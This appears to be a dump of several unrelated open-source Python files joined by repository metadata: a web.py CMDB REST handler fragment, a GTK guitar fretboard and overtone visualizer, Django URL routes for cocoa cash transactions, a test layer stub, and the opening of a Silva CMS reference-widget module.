SERVICE_GROUP_TYPE_MAPPING[sg['group_type']] for s in sg['service_list']: s['service_name'] = self.cmdb.GetServiceInfo(s['collector_id'], s['service_id'])['service_name'] return json.dumps(sg_list) def POST(self, **kwargs): data = json.loads(web.data()) return self.cmdb.AddServiceGroupsDict(data) class ServiceGroup(object): def __init__(self): self.cmdb = CMDB() def GET(self, id, **kwargs): web.header('Content-Type', 'application/json') sg = self.cmdb.GetServiceGroupDict(int(id)) if sg: sg['service_list'] = self.cmdb.GetServiceGroupServiceIdInfo(sg['group_id']).values() sg['group_type'] = SERVICE_GROUP_TYPE_MAPPING[sg['group_type']] return json.dumps(sg) raise RESTError('INFO.404.ITEM_NOT_FOUND') def PUT(self, id, **kwargs): data = json.loads(web.data()) if not self.cmdb.AddServiceGroupsDict(data, int(id)): raise RESTError('INFO.404.ITEM_NOT_FOUND') def DELETE(self, id, **kwargs): if not self.cmdb.DeleteServiceGroupInfo(int(id)): raise RESTError('INFO.404.ITEM_NOT_FOUND')
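These handler classes follow web.py's convention of passing URL capture groups as positional method arguments; a hypothetical urls tuple that would wire them up (the paths and patterns are illustrative, not taken from the project):

import web

urls = (
    r'/collectors/(\w+)/services',          'Services',
    r'/collectors/(\w+)/services/(\d+)',    'Service',
    r'/collectors/(\w+)/servicelist/(\w+)', 'ServiceList',
    r'/servicetree',                        'ServiceTree',
    r'/servicegroups/(\w+)',                'ServiceGroups',
    r'/servicegroup/(\d+)',                 'ServiceGroup',
)
app = web.application(urls, globals())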
UTF-8
Python
false
false
2,014
936,302,895,966
122400e5f585b9cfbaeaf55a9572048a6a3e2ec2
a96fa6daae2ae23b7bdcf9f1ff47fec1eb4f511d
/Visualizer.py
5dd0ddb61f1fd5cbda67a77b9615708598bbb713
[ "GPL-3.0-only" ]
non_permissive
mygrsun/Python-Guitar-Transcription-Aid
https://github.com/mygrsun/Python-Guitar-Transcription-Aid
f380d29099f67284d8e6133538e7df8c186bc20d
264892d4989f8bf025c84b35e65a1b17be4ab51c
refs/heads/master
2020-04-06T04:15:25.183296
2010-10-07T19:55:46
2010-10-07T19:55:46
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python import gtk, numpy, cairo, goocanvas, gobject import gst import Math # == PLAN == # class SemitoneBase(goocanvas.ItemSimple, goocanvas.Item) # class SemitoneGradient(SemitoneBase) # class SemitoneCumulate(SemitoneBase) # [class SemitoneAnalyze(SemitoneBase)] # # class FretboardBase(goocanvas.Group) # class Fretboard(FretboardBase) # class SingleString(FretboardBase) # # class FretboardWindowBase(gtk.Window) # class FretboardWindow(FretboardWindowBase) # class SingleStringWindow(FretboardWindowBase) # [class PlotWindow(gtk.Window)] # problem: if x or y is changed, will update be called? class Semitone(goocanvas.ItemSimple, goocanvas.Item): x = gobject.property(type=gobject.TYPE_DOUBLE) y = gobject.property(type=gobject.TYPE_DOUBLE) width = gobject.property(type=gobject.TYPE_DOUBLE, default=30) height = gobject.property(type=gobject.TYPE_DOUBLE, default=20) semitone = gobject.property(type=gobject.TYPE_DOUBLE, default=0) def __init__(self, control, method="gradient", **kwargs): goocanvas.ItemSimple.__init__(self,**kwargs) if not self.props.tooltip: self.props.tooltip = Math.note_name(self.semitone)+" ("+str(self.semitone)+") ["+str(Math.semitone_to_frequency(self.semitone))+" Hz]" self.method = method self.control = control self.control.connect("new_data", self.new_data) self.matrix = None # override ItemSimple def do_simple_paint(self, cr, bounds): cr.translate(self.x, self.y) cr.rectangle(0.0, 0.0, self.width, self.height) if not self.control.has_data: cr.set_source_rgb(1.,1.,1.) elif self.method=="cumulate": fpower, power, center, standard_deviation, upper_dependence, lower_dependence = self.control.analyze_semitone(self.semitone) magnitude = Math.power_to_magnitude(power / 1.5 / 1000) const,slope = self.control.get_brightness_coefficients_for_magnitude() brightness = slope*magnitude + const print self.semitone,"mag",magnitude,"tpow",power,"b",brightness,"pow",fpower cr.set_source_rgb(brightness,brightness,brightness) elif self.method=="test": fpower, power, center, standard_deviation, upper_dependence, lower_dependence = self.control.analyze_semitone(self.semitone) upper_dependence = min(1.,upper_dependence) lower_dependence = min(1.,lower_dependence) total_dependence = min(1., upper_dependence+lower_dependence) power *= 1. - total_dependence magnitude = Math.power_to_magnitude(power / 1.5 / 1000) const,slope = self.control.get_brightness_coefficients_for_magnitude() brightness = slope*magnitude + const cr.set_source_rgb(brightness,brightness,brightness) elif self.method=="inharmonicity": fpower, power, center, standard_deviation, upper_dependence, lower_dependence = self.control.analyze_semitone(self.semitone) brightness = standard_deviation / 0.5 cr.set_source_rgb(brightness,brightness,brightness) elif self.method=="lower_dependence": fpower, power, center, standard_deviation, upper_dependence, lower_dependence = self.control.analyze_semitone(self.semitone) brightness = lower_dependence cr.set_source_rgb(brightness,brightness,brightness) elif self.method=="upper_dependence": fpower, power, center, standard_deviation, upper_dependence, lower_dependence = self.control.analyze_semitone(self.semitone) brightness = upper_dependence cr.set_source_rgb(brightness,brightness,brightness) elif self.method=="gradient": assert not self.matrix==None gradient = self.control.get_gradient() gradient.set_matrix(self.matrix) cr.set_source(gradient) else: raise ValueError, "Invalid method" cr.fill_preserve() cr.set_source_rgb(0.,0.,0.) 
cr.stroke() def do_simple_update(self, cr): half_line_width = self.get_line_width() / 2. self.bounds_x1 = self.x - half_line_width self.bounds_y1 = self.y - half_line_width self.bounds_x2 = self.x + self.width + half_line_width self.bounds_y2 = self.y + self.height + half_line_width self.matrix = cairo.Matrix() self.matrix.scale(1./self.width,1.) self.matrix.translate((self.semitone-0.5)*self.width, 0) def do_simple_is_item_at(self, x, y, cr, is_pointer_event): if x < self.x: return False if y < self.y: return False if x > self.x+self.width: return False if y > self.y+self.height: return False return True # callbacks def new_data(self, control): self.changed(False) class FretboardBase(goocanvas.Group): def __init__(self, control, volume, **kwargs): self.volume = volume self.control = control if "strings" in kwargs: self.strings = kwargs["strings"] del kwargs["strings"] else: self.strings = [-5,-10,-14,-19,-24,-29] if "frets" in kwargs: self.frets = kwargs["frets"] del kwargs["frets"] else: self.frets = 12 if "rectwidth" in kwargs: self.rectwidth = kwargs["rectwidth"] del kwargs["rectwidth"] else: self.rectwidth = 30 if "rectheight" in kwargs: self.rectheight = kwargs["rectheight"] del kwargs["rectheight"] else: self.rectheight = 20 if "paddingx" in kwargs: self.paddingx = kwargs["paddingx"] del kwargs["paddingx"] else: self.paddingx = 5 if "paddingy" in kwargs: self.paddingy = kwargs["paddingy"] del kwargs["paddingy"] else: self.paddingy = 7 if "markers_radius" in kwargs: self.markers_radius = kwargs["markers_radius"] del kwargs["markers_radius"] else: self.markers_radius = self.rectheight/4. if "markers" in kwargs: self.markers = kwargs["markers"] del kwargs["markers"] else: self.markers = [5,7,9] if "capo" in kwargs: self.capo = kwargs["capo"] del kwargs["capo"] else: self.capo = 0 if "method" in kwargs: self.method = kwargs["method"] del kwargs["method"] else: self.method = "gradient" goocanvas.Group.__init__(self,**kwargs) self.pipeline = gst.parse_launch("audiotestsrc name=src wave=saw ! volume name=volume ! 
gconfaudiosink") self.construct(self.paddingx, self.paddingy) def construct(self, posx, posy): # fretboard for string in xrange(len(self.strings)): semitone = self.strings[string] for fret in xrange(self.frets+1): x = posx + fret*self.rectwidth y = posy + self.rectheight*string rect = Semitone(self.control, semitone=semitone+fret, method=self.method, parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) rect.connect("button_press_event", self.press_semitone, string, fret) rect.connect("button_release_event", self.release_semitone) y = posy + self.rectheight*(len(self.strings) + 0.5) for fret in self.markers: x = posx + self.rectwidth*(fret+0.5) circle = goocanvas.Ellipse(parent=self, center_x=x, center_y=y, radius_x=self.markers_radius, radius_y=self.markers_radius) circle.props.fill_color_rgba=0x333333ff circle.props.line_width=0 if self.capo: x = posx + self.rectwidth*(self.capo+.3) y1 = posy y2 = posy + self.rectheight*len(self.strings) width = self.rectwidth/3 goocanvas.polyline_new_line(self, x,y1,x,y2, width=line_width, stroke_color_rgba=0x660000cc, pointer_events=0) # draw nut x = posx + self.rectwidth*.3 y1 = posy y2 = posy + self.rectheight*len(self.strings) width = self.rectwidth/3 goocanvas.polyline_new_line(self, x,y1,x,y2, line_width=width, stroke_color_rgba=0xcc0000cc, pointer_events=0) def get_width(self): return self.get_bounds().x2 - self.get_bounds().x1 + 2*self.paddingx def get_height(self): return self.get_bounds().y2 - self.get_bounds().y1 + 2*self.paddingy # callbacks def press_semitone(self,semitone,target,event,string,fret): if event.button==1: self.pipeline.get_by_name("volume").set_property("volume", self.volume.get_value()) self.pipeline.get_by_name("src").set_property("freq", Math.semitone_to_frequency(semitone.semitone)) self.pipeline.set_state(gst.STATE_PLAYING) elif event.button==3: self.open_context_menu(semitone,event,string,fret) def release_semitone(self,item,target,event): self.pipeline.set_state(gst.STATE_NULL) def open_context_menu(self, rect, event, string, fret): raise NotImplementedError, "override this method!" 
def add_tab_marker(self, item, target, event, string, fret): self.control.emit("add-tab-marker", string, fret) def plot_evolution(self, item, target, event, semitone): self.control.emit("plot-evolution", semitone) def find_onset(self, item, target, event, semitone): self.control.emit("find-onset", semitone) def analyze_semitone(self, item, target, event, semitone): self.control.emit("analyze-semitone", semitone) def open_overtones(self, item, target, event, tuning): w = OvertoneWindow(self.control, tuning) w.show_all() def open_undertones(self, item, target, event, tuning): w = UndertoneWindow(self.control, tuning) w.show_all() def semitone_to_equalizer(self, item, target, event, semitone): self.control.emit("semitone-to-equalizer", semitone) def overtones_to_equalizer(self, item, target, event, semitone): self.control.emit("overtones-to-equalizer", semitone) # custom properties def do_get_property(self,pspec): return getattr(self, pspec.name) def do_set_property(self,pspec,value): setattr(self, pspec.name, value) class Fretboard(FretboardBase): def __init__(self, control, volume, **kwargs): FretboardBase.__init__(self, control, volume, **kwargs) def construct(self, posx, posy): # captions fretcaptions = goocanvas.Group(parent=self) for fret in xrange(1,self.frets+1): goocanvas.Text(parent=fretcaptions, x=fret*self.rectwidth, y=0, text=str(fret), anchor=gtk.ANCHOR_NORTH, font=10) stringcaptions = goocanvas.Group(parent=self) for string in xrange(len(self.strings)): semitone = self.strings[string] name = Math.note_name(semitone).upper() text = goocanvas.Text(parent=stringcaptions, x=0, y=string*self.rectheight, text=name, anchor=gtk.ANCHOR_EAST, font=10) text.connect("button_release_event", self.open_overtones, self.strings[string]) startx = posx + stringcaptions.get_bounds().x2-stringcaptions.get_bounds().x1 + 5 starty = posy + fretcaptions.get_bounds().y2-fretcaptions.get_bounds().y1 fretcaptions.props.x = startx + 0.5*self.rectwidth fretcaptions.props.y = posy stringcaptions.props.x = startx - 5 stringcaptions.props.y = starty + 0.5*self.rectheight # fretboard FretboardBase.construct(self, startx, starty) def open_context_menu(self, rect, event, string, fret): menu = gtk.Menu() item = gtk.MenuItem("Overtones") item.connect("activate", self.open_overtones, item, None, self.strings[string]) menu.append(item) item = gtk.MenuItem("Undertones") item.connect("activate", self.open_undertones, item, None, self.strings[string]) menu.append(item) item = gtk.MenuItem("Analyze") item.connect("activate", self.analyze_semitone, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Plot") item.connect("activate", self.plot_evolution, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Find onset") item.connect("activate", self.find_onset, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Add to tabulature") item.connect("activate", self.add_tab_marker, item, None, string, fret) menu.append(item) item = gtk.MenuItem("Set equalizer transmissive") item.connect("activate", self.overtones_to_equalizer, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Set equalizer transmissive (only root)") item.connect("activate", self.semitone_to_equalizer, item, None, self.strings[string]+fret) menu.append(item) menu.show_all() menu.popup(None, None, None, event.button, event.time) class Overtones(FretboardBase): def __init__(self, control, volume, **kwargs): if "tuning" in kwargs: self.tuning = kwargs["tuning"] del 
kwargs["tuning"] else: self.tuning = -5 if "overtones" in kwargs: self.overtones = kwargs["overtones"] del kwargs["overtones"] else: self.overtones = 10 if not "rectheight" in kwargs: kwargs["rectheight"] = 10 kwargs["strings"] = [] for multiplicator in xrange(1,self.overtones+2): semitone = self.tuning + 12.*numpy.log2(multiplicator) kwargs["strings"].append(semitone) if "method" in kwargs: if not kwargs["method"] in ["gradient","cumulate"]: raise ValueError, "invalid method for Overtones" FretboardBase.__init__(self, control, volume, **kwargs) def construct(self, posx, posy): # captions fretcaptions = goocanvas.Group(parent=self) for fret in xrange(1,self.frets+1): goocanvas.Text(parent=fretcaptions, x=fret*self.rectwidth, y=0, text=str(fret), anchor=gtk.ANCHOR_NORTH, font=10) stringcaptions = goocanvas.Group(parent=self) goocanvas.Text(parent=stringcaptions, x=0, y=0, text="f.", anchor=gtk.ANCHOR_EAST, font=10) for overtone in xrange(1,self.overtones+1): name = str(overtone)+"." goocanvas.Text(parent=stringcaptions, x=0, y=overtone*self.rectheight, text=name, anchor=gtk.ANCHOR_EAST, font=10) startx = posx + stringcaptions.get_bounds().x2-stringcaptions.get_bounds().x1 + 5 starty = posy + fretcaptions.get_bounds().y2-fretcaptions.get_bounds().y1 fretcaptions.props.x = startx + 0.5*self.rectwidth fretcaptions.props.y = posy stringcaptions.props.x = startx - 5 stringcaptions.props.y = starty + 0.5*self.rectheight # fretboard FretboardBase.construct(self, startx, starty) # analyze # y = self.get_bounds().y2 + 10 # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="inharmonicity", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="lower_dependence", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="upper_dependence", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="cumulate", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="test", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # callbacks def open_context_menu(self, rect, event, string, fret): semitone = self.tuning + fret menu = gtk.Menu() item = gtk.MenuItem("Overtones") item.connect("activate", self.open_overtones, item, None, self.strings[string]) menu.append(item) item = gtk.MenuItem("Undertones") item.connect("activate", self.open_undertones, item, None, self.strings[string]) menu.append(item) item = gtk.MenuItem("Analyze") item.connect("activate", self.analyze_semitone, item, None, self.tuning+fret) menu.append(item) item = gtk.MenuItem("Plot") item.connect("activate", self.plot_evolution, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Find onset") item.connect("activate", self.find_onset, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Set 
equalizer transmissive") item.connect("activate", self.semitone_to_equalizer, item, None, self.strings[string]+fret) menu.append(item) # item = gtk.MenuItem("Add to tabulature") # item.connect("activate", self.add_tab_marker, item, None, string, fret) # menu.append(item) menu.show_all() menu.popup(None, None, None, event.button, event.time) class Undertones(FretboardBase): def __init__(self, control, volume, **kwargs): if "tuning" in kwargs: self.tuning = kwargs["tuning"] del kwargs["tuning"] else: self.tuning = -5 if "undertones" in kwargs: self.undertones = kwargs["undertones"] del kwargs["undertones"] else: self.undertones = 10 if not "rectheight" in kwargs: kwargs["rectheight"] = 10 kwargs["strings"] = [] for divisor in xrange(1,self.undertones+2): semitone = self.tuning + 12.*numpy.log2(1./divisor) kwargs["strings"].append(semitone) if "method" in kwargs: if not kwargs["method"] in ["gradient","cumulate"]: raise ValueError, "invalid method for Undertones" FretboardBase.__init__(self, control, volume, **kwargs) def construct(self, posx, posy): # captions fretcaptions = goocanvas.Group(parent=self) for fret in xrange(1,self.frets+1): goocanvas.Text(parent=fretcaptions, x=fret*self.rectwidth, y=0, text=str(fret), anchor=gtk.ANCHOR_NORTH, font=10) stringcaptions = goocanvas.Group(parent=self) goocanvas.Text(parent=stringcaptions, x=0, y=0, text="f.", anchor=gtk.ANCHOR_EAST, font=10) for undertone in xrange(1,self.undertones+1): name = "-"+str(undertone)+"." goocanvas.Text(parent=stringcaptions, x=0, y=undertone*self.rectheight, text=name, anchor=gtk.ANCHOR_EAST, font=10) startx = posx + stringcaptions.get_bounds().x2-stringcaptions.get_bounds().x1 + 5 starty = posy + fretcaptions.get_bounds().y2-fretcaptions.get_bounds().y1 fretcaptions.props.x = startx + 0.5*self.rectwidth fretcaptions.props.y = posy stringcaptions.props.x = startx - 5 stringcaptions.props.y = starty + 0.5*self.rectheight # fretboard FretboardBase.construct(self, startx, starty) # analyze # y = self.get_bounds().y2 + 10 # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="inharmonicity", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="lower_dependence", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="upper_dependence", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="cumulate", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # # y += self.rectheight # for fret in xrange(0,self.frets+1): # x = startx + self.rectwidth*fret # rect = Semitone(self.control, semitone=self.tuning+fret, method="test", parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) # callbacks def open_context_menu(self, rect, event, string, fret): semitone = self.tuning + fret menu = gtk.Menu() item = gtk.MenuItem("Overtones") item.connect("activate", self.open_overtones, item, None, self.strings[string]) menu.append(item) item = gtk.MenuItem("Undertones") item.connect("activate", 
self.open_undertones, item, None, self.strings[string]) menu.append(item) item = gtk.MenuItem("Analyze") item.connect("activate", self.analyze_semitone, item, None, self.tuning+fret) menu.append(item) item = gtk.MenuItem("Plot") item.connect("activate", self.plot_evolution, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Find onset") item.connect("activate", self.find_onset, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Set equalizer transmissive") item.connect("activate", self.semitone_to_equalizer, item, None, self.strings[string]+fret) menu.append(item) # item = gtk.MenuItem("Add to tabulature") # item.connect("activate", self.add_tab_marker, item, None, string, fret) # menu.append(item) menu.show_all() menu.popup(None, None, None, event.button, event.time) class FretboardWindowBase(gtk.Window): def __init__(self, **kwargs): gtk.Window.__init__(self, **kwargs) vbox = gtk.VBox() self.add(vbox) self.controls = gtk.VBox() vbox.add(self.controls) hbox = gtk.HBox() vbox.add(hbox) label = gtk.Label("Volume") hbox.add(label) self.volume = gtk.Adjustment(0.04,0.0,10.0,0.01) spinbtn = gtk.SpinButton(self.volume,0.01,2) hbox.add(spinbtn) self.canvas = goocanvas.Canvas() self.connect_after("realize", self.set_default_background, self.canvas) self.canvas.set_property("has-tooltip", True) vbox.add(self.canvas) self.connect("delete-event", self.stop_playing) def stop_playing(self, *args): self.visualizer.pipeline.set_state(gst.STATE_NULL) def adjust_canvas_size(self): width = self.visualizer.get_width() height = self.visualizer.get_height() self.canvas.set_bounds(0,0,width,height) self.canvas.set_size_request(int(width),int(height)) def set_default_background(self, from_widget, to_widget): # background color is only available when widget is realized color = from_widget.get_style().bg[gtk.STATE_NORMAL] to_widget.set_property("background_color", color) class FretboardWindow(FretboardWindowBase): def __init__(self, control, **kwargs): FretboardWindowBase.__init__(self, **kwargs) self.set_title("Fretboard") root = self.canvas.get_root_item() self.visualizer = Fretboard(control, self.volume, parent=root) self.adjust_canvas_size() hbox = gtk.HBox() self.controls.add(hbox) label = gtk.Label("Method") hbox.add(label) combobox = gtk.combo_box_new_text() # string = self.project.timeline.tabulature.strings[i] # combobox.append_text(str(i+1)+" ("+str(string.tuning)+")") combobox.set_active(0) class OvertoneWindow(FretboardWindowBase): def __init__(self, control, tuning=-5, **kwargs): FretboardWindowBase.__init__(self, **kwargs) self.set_title("Overtones of %s-tuned string (%f - %f Hz)" % (Math.note_name(tuning), tuning, Math.semitone_to_frequency(tuning))) root = self.canvas.get_root_item() self.visualizer = Overtones(control, self.volume, parent=root, tuning=tuning) self.adjust_canvas_size() class UndertoneWindow(FretboardWindowBase): def __init__(self, control, tuning=-5, **kwargs): FretboardWindowBase.__init__(self, **kwargs) self.set_title("Undertones of %s-tuned string (%f - %f Hz)" % (Math.note_name(tuning), tuning, Math.semitone_to_frequency(tuning))) root = self.canvas.get_root_item() self.visualizer = Undertones(control, self.volume, parent=root, tuning=tuning) self.adjust_canvas_size()
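The Overtones and Undertones classes above derive their "strings" from the harmonic series of a single tuning: the k-th overtone is 12*log2(k) semitones above the fundamental, and the k-th undertone is 12*log2(1/k) semitones below it. The following standalone sketch restates just that mapping outside the GUI code; the helper names are mine, only the formula is taken from the classes above.

import numpy as np

def overtone_semitones(tuning, overtones=10):
    """Semitone values of the fundamental plus the first `overtones`
    harmonics of a string tuned to `tuning` semitones, as computed in
    the Overtones class above."""
    # The k-th harmonic has k times the fundamental frequency,
    # i.e. it sits 12*log2(k) semitones above the fundamental.
    return [tuning + 12.0 * np.log2(k) for k in range(1, overtones + 2)]

def undertone_semitones(tuning, undertones=10):
    """Same idea for undertones: frequency divided by k, which is
    12*log2(1/k) semitones below the fundamental (Undertones class)."""
    return [tuning + 12.0 * np.log2(1.0 / k) for k in range(1, undertones + 2)]

if __name__ == "__main__":
    # tuning = -5 is the default used by both windows above; the 2nd
    # harmonic lands exactly one octave (12 semitones) higher.
    print(overtone_semitones(-5, 3))   # [-5.0, 7.0, 14.02..., 19.0]
    print(undertone_semitones(-5, 3))  # [-5.0, -17.0, -24.02..., -29.0]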
UTF-8
Python
false
false
2,010
8,924,942,045,904
dd2c8b44fb05f9459234414cbf550684a5b6ee74
c4dd89e1175753469b442745d5ea910d4f71c8c3
/cocoa_cash/urls.py
b7d8c073bdebc4c171dc2db94054cb7fd16405f9
[]
no_license
samba6/saanu-proj
https://github.com/samba6/saanu-proj
bfee7b15d414a5923a4a677bc5c377fed0a3d69f
a83311e298e7840cfa7f59b5003a964a24ee7ca6
refs/heads/master
2016-08-08T06:26:24.671102
2014-08-01T00:02:30
2014-08-01T00:02:30
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.conf.urls import url, patterns

from cocoa_cash import views

withdraw_cash_from_bank_list = views.WithdrawCashFromBankViewSet.as_view({
    'get': 'list',
    'post': 'create',
})
withdraw_cash_from_bank_detail = views.WithdrawCashFromBankViewSet.as_view({
    'get': 'retrieve',
    'put': 'update',
    'patch': 'partial_update',
    'delete': 'destroy'
})
withdraw_cash_from_bank_home = views.WithdrawCashFromBankViewSet.as_view({
    'get': 'render_create_form'
})

urlpatterns = patterns(
    '',
    url(r'^receive-coy-money/$', withdraw_cash_from_bank_list,
        name='withdrawcashfrombank-list',),
    url(r'^receive-coy-money/(?P<pk>\d+)/$', withdraw_cash_from_bank_detail,
        name='withdrawcashfrombank-detail',),
    url(r'^create-receive-coy-money/$', withdraw_cash_from_bank_home,
        name='withdrawcashfrombank-home'),
)

advance_cash_to_customer_list = views.AdvanceCashToCustomerViewSet.as_view({
    'get': 'list',
    'post': 'create',
})
advance_cash_to_customer_detail = views.AdvanceCashToCustomerViewSet.as_view({
    'get': 'retrieve',
    'put': 'update',
    'patch': 'partial_update',
    'delete': 'destroy'
})
advance_cash_to_customer_home = views.AdvanceCashToCustomerViewSet.as_view({
    'get': 'advance_cash_to_customer_home'
})

urlpatterns += patterns(
    '',
    url(r'^advance-cash-to-customer/$', advance_cash_to_customer_list,
        name='advancecashtocustomer-list',),
    url(r'^advance-cash-to-customer/(?P<pk>\d+)/$', advance_cash_to_customer_detail,
        name='advancecashtocustomer-detail',),
    url(r'^advance-cash-to-customer/home/$', advance_cash_to_customer_home,
        name='advancecashtocustomer-home',),
)

cocoa_from_customer_list = views.CocoaFromCustomerViewSet.as_view({
    'get': 'list',
    'post': 'create',
})
cocoa_from_customer_detail = views.CocoaFromCustomerViewSet.as_view({
    'get': 'retrieve',
    'put': 'update',
    'delete': 'destroy',
    'patch': 'partial_update',
})
cocoa_from_customer_home = views.CocoaFromCustomerViewSet.as_view({
    'get': 'cocoa_from_customer_home',
})

urlpatterns += patterns(
    '',
    url(r'^cocoa-from-customer/$', cocoa_from_customer_list,
        name='cocoafromcustomer-list'),
    url(r'^cocoa-from-customer/(?P<pk>\d+)/$', cocoa_from_customer_detail,
        name='cocoafromcustomer-detail'),
    url(r'^cocoa-from-customer/home/$', cocoa_from_customer_home,
        name='cocoafromcustomer-home'),
)
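Because every route above carries a name, other code can resolve URLs without hard-coding paths. A minimal sketch of that, assuming this urlconf is included at the project root and using the old-style import path that matches the patterns()-era Django this file targets:

# Hypothetical shell session; the resolved paths assume the urlconf above
# is mounted at the site root.
from django.core.urlresolvers import reverse

reverse('withdrawcashfrombank-list')                  # -> '/receive-coy-money/'
reverse('withdrawcashfrombank-detail', kwargs={'pk': 3})  # -> '/receive-coy-money/3/'
reverse('cocoafromcustomer-home')                     # -> '/cocoa-from-customer/home/'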
UTF-8
Python
false
false
2,014
5,351,529,268,924
b33c116799cdc23e9fb2bc8c68cbfab240ecc9e6
259640b40d46d4fe1386c1d7d78799aef5f59502
/tests/integration/__init__.py
576abe33915d751d5757b7e8cc86388a89730ece
[]
no_license
thedrow/nose2-testsuite
https://github.com/thedrow/nose2-testsuite
7e78c6586f11f76b0ff36ed3b4d96b8e6ea23e93
17b7124bdb660890de0c0dd7ec0a01961376f9a7
refs/heads/master
2016-09-15T18:27:12.951878
2013-06-20T21:36:02
2013-06-20T21:36:02
9,029,600
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
class IntegrationTestsLayer(object):
    pass
UTF-8
Python
false
false
2,013
3,435,973,862,934
859579e990604d3c9fb8b5ff13505eeeb4dae613
4357b8f9900ac01108dab3f558f93779ac5eedfd
/src/silva/core/references/widgets/formulator.py
aa2048ee2b003b1c8bc2cc27e1e7d301bddb1c4d
[]
no_license
silvacms/silva.core.references
https://github.com/silvacms/silva.core.references
a5f8c0ac5f0cf9c02ea3a7cbe383ae9ade3839a5
0fc71f32e1a38105537d212398f8131dddfeb163
refs/heads/master
2016-09-06T10:42:36.811219
2013-12-18T15:07:27
2013-12-18T15:07:27
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*- # Copyright (c) 2010-2013 Infrae. All rights reserved. # See also LICENSE.txt import uuid import logging from Acquisition import aq_parent import AccessControl from zeam.form.silva.datamanager import FieldValueWriter from zeam.form.silva.datamanager import FieldValueReader from Products.Formulator.Field import ZMIField from Products.Formulator.FieldRegistry import FieldRegistry from Products.Formulator.Validator import Validator from Products.Formulator.Widget import Widget from Products.Formulator.DummyField import fields from grokcore.chameleon.components import ChameleonPageTemplate from zope.interface import Interface from zeam import component from silva.core.interfaces import ISilvaObject from silva.core.interfaces.errors import ExternalReferenceError from silva.core.references.reference import ReferenceSet from silva.core.references.reference import get_content_from_id from silva.core.references.utils import relative_path from silva.core.references.utils import is_inside_container from silva.core.references.utils import canonical_path from silva.core.references.widgets import ReferenceInfoResolver from silva.translations import translate as _ _marker = object() logger = logging.getLogger('silva.core.references') NS_REFERENCES = "http://infrae.com/namespace/silva-references" def get_request(): """Return the request when you are lost. """ manager = AccessControl.getSecurityManager() return manager.getUser().REQUEST class ReferencesSolver(object): """Object used to delay the references resolving in deserializeValue: - This object is returned instead of the target of the reference duing the deserialization. - Required setting and callback used to set the resolved references are collecting then this object is saved in Formulator. - The reference is resolved and effectively set when is the import of all the others content are done. """ def __init__(self, producer, field): self._id = field.getId() self._importer = producer.getExtra() self._context = None self._contents = [] self._expected = 0 self._callback = None self._single = True def report(self, message): self._importer.reportProblem( "Error in field '{0}': {1}".format(self._id, message), self._context) def defer(self, callback, single, context): assert self._callback is None, 'Defer called twice' self._callback = callback self._single = single self._context = context def add(self, path): self._importer.addAction(self.resolve, [path]) self._expected += 1 def resolve(self, path): if path: imported_path = self._importer.getImportedPath(canonical_path(path)) if imported_path is not None: path = map(str, imported_path.split('/')) try: target = self._importer.root.unrestrictedTraverse(path) except (AttributeError, KeyError): self.report( 'Could not traverse imported path {0}.'.format(path)) self._contents.append(target) else: self.report( 'Could not resolve imported path {0}.'.format(path)) else: self.report('Broken reference.') self._expected -= 1 if not self._expected and self._callback is not None: if self._single: if self._contents: if len(self._contents) != 1: self.reportProblem( 'Found multiple paths where only one was expected.') self._callback(self._contents[0]) else: self._callback(self._contents) class ReferenceValidator(Validator): """Extract and validate a reference. 
